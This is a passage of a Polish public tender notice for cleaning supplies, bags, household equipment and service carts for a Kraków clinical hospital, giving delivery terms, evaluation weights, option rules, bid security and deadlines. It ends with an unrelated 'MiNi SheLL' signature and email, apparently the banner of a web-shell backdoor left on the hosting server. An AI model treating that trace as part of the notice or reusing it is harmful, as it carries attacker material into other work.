terminie 4 dni roboczych, licząc od dnia przesłania zamówienia cząstkowego przez Zamawiającego.<br/>- Wykonawca realizował będzie dostawy Asortymentu z należytą starannością i zgodnie z warunkami umowy. Dostarczany Asortyment będzie wolny od wad, dopuszczony do obrotu, dobrej jakości i zgodny z obowiązującymi normami jakościowymi oraz wymaganiami Zamawiającego, fabrycznie nowy i pochodzący z bieżącej produkcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39500000-7 - Wyroby włókiennicze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem postępowania są sukcesywne dostawy środków i sprzętu do utrzymania czystości dla Szpitala Klinicznego im. dr. J. Babińskiego SPZOZ w Krakowie, zgodnie z Asortymentem określonym dla Pakietu VI. <br/>2.	Przedmiot zamówienia realizowany będzie w Asortymencie jakościowym i ilościowym określonym w Formularzu cenowym - Pakiet VI – Worki (załącznik nr 1.6 do SWZ)<br/>3.	Przedmiot zamówienia realizowany będzie zgodnie z wymaganiami Zamawiającego określonymi we wzorze umowy – załączniku nr 9 do SWZ, w tym między innymi: <br/>- Wykonawca realizował będzie dostawy wraz z wniesieniem oraz rozładunkiem Asortymentu w Magazynie Głównym Zamawiającego w Krakowie przy ul. dr. J. Babińskiego 29 oraz bezpośrednio w jednostkach organizacyjnych Zamawiającego, wskazanych w załączniku nr 12 do SWZ.<br/>- Wykonawca dostarczał będzie zamówiony Asortyment na podstawie zamówień cząstkowych składanych przez Zamawiającego, z częstotliwością raz na miesiąc kalendarzowy, z tym zastrzeżeniem, że w przypadku wystąpienia zwiększonych potrzeb Zamawiającego, Wykonawca dostarczy zamówiony Asortyment z większą częstotliwością niż jeden raz na miesiąc kalendarzowy (ilość dostaw w ciągu miesiąca kalendarzowego nie powinna przekroczyć trzech dostaw).<br/>- Wykonawca będzie realizował każdą dostawę cząstkową w terminie 4 dni roboczych, licząc od dnia przesłania zamówienia cząstkowego przez Zamawiającego.<br/>- Wykonawca realizował będzie dostawy Asortymentu z należytą starannością i zgodnie z warunkami umowy. Dostarczany Asortyment będzie wolny od wad, dopuszczony do obrotu, dobrej jakości i zgodny z obowiązującymi normami jakościowymi oraz wymaganiami Zamawiającego, fabrycznie nowy i pochodzący z bieżącej produkcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">19520000-7 - Produkty z tworzyw sztucznych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem postępowania są sukcesywne dostawy środków i sprzętu do utrzymania czystości dla Szpitala Klinicznego im. dr. J. Babińskiego SPZOZ w Krakowie, zgodnie z Asortymentem określonym dla Pakietu VII. <br/>2.	Przedmiot zamówienia realizowany będzie w Asortymencie jakościowym i ilościowym określonym w Formularzu cenowym - Pakiet VII – Wyposażenie domowe (załącznik nr 1.7 do SWZ)<br/>3.	Przedmiot zamówienia realizowany będzie zgodnie z wymaganiami Zamawiającego określonymi we wzorze umowy – załączniku nr 10 do SWZ, w tym między innymi: <br/>- Wykonawca realizował będzie dostawy wraz z wniesieniem oraz rozładunkiem Asortymentu w Magazynie Głównym Zamawiającego w Krakowie przy ul. dr. J. Babińskiego 29 oraz bezpośrednio w jednostkach organizacyjnych Zamawiającego, wskazanych w załączniku nr 12 do SWZ.<br/>- Wykonawca dostarczał będzie zamówiony Asortyment na podstawie zamówień cząstkowych składanych przez Zamawiającego, z częstotliwością raz na miesiąc kalendarzowy, z tym zastrzeżeniem, że w przypadku wystąpienia zwiększonych potrzeb Zamawiającego, Wykonawca dostarczy zamówiony Asortyment z większą częstotliwością niż jeden raz na miesiąc kalendarzowy (ilość dostaw w ciągu miesiąca kalendarzowego nie powinna przekroczyć trzech dostaw).<br/>- Wykonawca będzie realizował każdą dostawę cząstkową w terminie 4 dni roboczych, licząc od dnia przesłania zamówienia cząstkowego przez Zamawiającego.<br/>- Wykonawca realizował będzie dostawy Asortymentu z należytą starannością i zgodnie z warunkami umowy. Dostarczany Asortyment będzie wolny od wad, dopuszczony do obrotu, dobrej jakości i zgodny z obowiązującymi normami jakościowymi oraz wymaganiami Zamawiającego, fabrycznie nowy i pochodzący z bieżącej produkcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39200000-4 - Wyposażenie domowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem postępowania są sukcesywne dostawy sprzętu do utrzymania czystości dla Szpitala Klinicznego im. dr. J. Babińskiego SPZOZ w Krakowie, zgodnie z Asortymentem określonym dla Pakietu VIII. <br/>2.	Przedmiot zamówienia realizowany będzie w Asortymencie jakościowym i ilościowym określonym w Formularzu cenowym - Pakiet VIII – Wózki serwisowe (załącznik nr 1.8 do SWZ)<br/>3.	Przedmiot zamówienia realizowany będzie zgodnie z wymaganiami Zamawiającego określonymi we wzorze umowy – załączniku nr 11 do SWZ, w tym między innymi: <br/>- Wykonawca zrealizuje dostawę wraz z wniesieniem oraz rozładunkiem Asortymentu w Magazynie Głównym Zamawiającego w Krakowie przy ul. dr. J. Babińskiego 29 oraz bezpośrednio w jednostkach organizacyjnych Zamawiającego, wskazanych w załączniku nr 12 do SWZ.<br/>- Dostarczany Asortyment będzie: wolny od wad, dopuszczony do obrotu, fabrycznie nowy i dobrej jakości, zgodnej z obowiązującymi normami jakościowymi i wymaganiami Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34911100-7 - Wózki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający może skorzystać z prawa opcji w zakresie dostawy Asortymentu w ramach Pakietu VIII (załącznik nr 1.8 do SWZ) na następujących zasadach:<br/>- skorzystanie z prawa opcji nie stanowi zmiany umowy,<br/>- zlecenie dostawy Asortymentu w ramach prawa opcji może, ale nie musi nastąpić w zależności od zapotrzebowania Zamawiającego oraz wysokości środków finansowych posiadanych przez Zamawiającego na ten cel. <br/>2.	Realizacja dostawy Asortymentu w ramach prawa opcji może być zlecona Wykonawcy:<br/>- w całości, co oznacza, że Zamawiający może zlecić Wykonawcy dostawę po 5 sztuk wózków do sprzątania z każdego rodzaju wózka do sprzątania (Asortymentu), lub<br/> - w części, co oznacza, że Zamawiający może zlecić Wykonawcy dostawę wózków do sprzątania w mniejszej ilości niż po 5 sztuk z każdego rodzaju wózka (Asortymentu), lub<br/>- wcale.<br/>3.	W przypadku skorzystania przez Zamawiającego z prawa opcji, wynagrodzenie przysługuje Wykonawcy z tytułu realizacji zleconej Wykonawcy dostawy Asortymentu.<br/>4.	Wykonawcy nie przysługuje prawo domagania się realizacji dostawy Asortymentu w zakresie prawa opcji, jeżeli Zamawiający nie skorzysta z przedmiotowego prawa. Nieskorzystanie przez Zamawiającego z prawa opcji nie wymaga podania przyczyny i nie stanowi podstawy do dochodzenia względem niego odpowiedzialności z tytułu niewykonania umowy.<br/>5.	Ewentualne skorzystanie przez Zamawiającego z prawa opcji będzie polegało na przekazaniu przez Zamawiającego względem Wykonawcy oświadczeń w przedmiocie skorzystania z tego prawa wraz ze zleceniem Wykonawcy realizacji dostaw Asortymentu, na warunkach określonych w umowie. <br/>6.	Zamawiający zastrzega sobie prawo do wielokrotnego zlecania Wykonawcy realizacji dostaw Asortymentu w ramach prawa opcji, a to według potrzeb Zamawiającego. Dla oświadczeń Zamawiającego o skorzystaniu z prawa opcji wskazanych w umowie Strony przewidują formę pisemną pod rygorem nieważności.<br/>7.	W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawca jest zobowiązany do jego realizacji na warunkach określonych w umowie, co Wykonawca akceptuje przez podpisanie umowy.<br/>8. Terminy wykonania przez Wykonawcę przedmiotu zamówienia w zakresie Pakietu VIII: 6 miesięcy od dnia zawarcia umowy, z tym zastrzeżeniem, że:<br/>- dostawa zamówienia podstawowego nastąpi w terminie do 7 dni od dnia zawarcia umowy, <br/>- dostawa zamówienia w ramach prawa opcji może zostać zrealizowana w terminie 6 miesięcy od dnia zawarcia umowy, z tym zastrzeżeniem, że Wykonawca dostarczy Zamawiającemu zamówiony w ramach prawa opcji Asortyment (na zasadach opisanych w umowie) w terminie 14 dni od dnia przekazania przez Zamawiającego względem Wykonawcy oświadczeń w przedmiocie skorzystania z prawa opcji wraz ze zleceniem Wykonawcy realizacji dostaw Asortymentu. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium dla zamówienia w ramach Pakietu IV i Pakietu VI. W pozostałych Pakietach Zamawiający nie wymaga wniesienia wadium.<br/>2.	Każda składana oferta:<br/>- w zakresie Pakietu IV musi być zabezpieczona wadium w wysokości 4 000,00 zł;<br/>- w zakresie Pakietu VI musi być zabezpieczona wadium w wysokości 2 500,00 zł.<br/>3.	Wadium wnosi się przed upływem terminu składania ofert, tj. przed godz. 09:00 w dniu 06.08.2024r. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy Zamawiający przewidział szczegółowo w paragrafach 8 i 9 wzorów umów - załączników nr 4 - 10 oraz w paragrafie 8 wzoru umowy - załącznika nr 11 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/szpital_babinski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-06 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający informuje, że (zgodnie z zapisami SWZ) z postępowania o udzielenie zamówienia wykluczy Wykonawcę na podstawie:<br/>- art. 108 ust. 1 ustawy Prawo zamówień publicznych,<br/>- art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego .<br/><br/>W ramach niniejszego postępowania Wykonawca składa dokumenty i oświadczenia wymagane w SWZ, w tym między innymi: Załącznik nr 1 do SWZ - Formularz ofertowy Wykonawcy, Załączniki nr 1.1 – 1.8 do SWZ - Formularze cenowe – dla Pakietów I - VIII (w zależności na który pakiet składa ofertę), Załącznik nr 2 do SWZ - Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, Załącznik nr 2.1 do SWZ - Oświadczenie Wykonawcy o zakresie wykonania zamówienia przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy), Załącznik nr 3 do SWZ - Oświadczenie o zobowiązaniu podmiotu oddającego do dyspozycji Wykonawcy niezbędne zasoby na potrzeby realizacji zamówienia (jeżeli dotyczy).

Creat By MiNi SheLL
Email: jattceo@gmail.com